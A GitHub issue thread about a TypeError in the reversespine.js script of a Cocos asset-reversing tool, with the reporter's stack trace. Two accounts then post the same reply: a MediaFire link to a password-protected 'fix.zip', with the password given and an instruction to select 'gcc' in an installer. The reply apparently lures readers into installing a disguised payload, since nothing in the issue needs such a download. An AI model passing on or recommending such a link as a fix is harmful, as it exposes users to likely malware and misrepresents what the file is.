### ISSUE TITLE
TypeError: Cannot read properties of undefined (reading 'length')

### ISSUE THREAD

**Issue by bigsinger** [zwq418/cocos_revert#4]
```
PS D:\Apps\XXXXXXXXXX\assets\cocos_revert-main> node reversespine.js
D:\Apps\XXXXXXXXXX\assets\cocos_revert-main\reversespine.js:57
    for (let i = 0; i < imageNames.length; i++) {
                                   ^

TypeError: Cannot read properties of undefined (reading 'length')
    at parseSpineJson (D:\Apps\XXXXXXXXXX\assets\cocos_revert-main\reversespine.js:57:36)
    at D:\Apps\XXXXXXXXXX\assets\cocos_revert-main\reversespine.js:33:13
    at Array.forEach (<anonymous>)
    at readFile (D:\Apps\XXXXXXXXXX\assets\cocos_revert-main\reversespine.js:30:17)
    at Object.<anonymous> (D:\Apps\XXXXXXXXXX\assets\cocos_revert-main\reversespine.js:72:1)
    at Module._compile (node:internal/modules/cjs/loader:1469:14)
    at Module._extensions..js (node:internal/modules/cjs/loader:1548:10)
    at Module.load (node:internal/modules/cjs/loader:1288:32)
    at Module._load (node:internal/modules/cjs/loader:1104:12)
    at Function.executeUserEntryPoint [as runMain] (node:internal/modules/run_main:174:12)


```

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
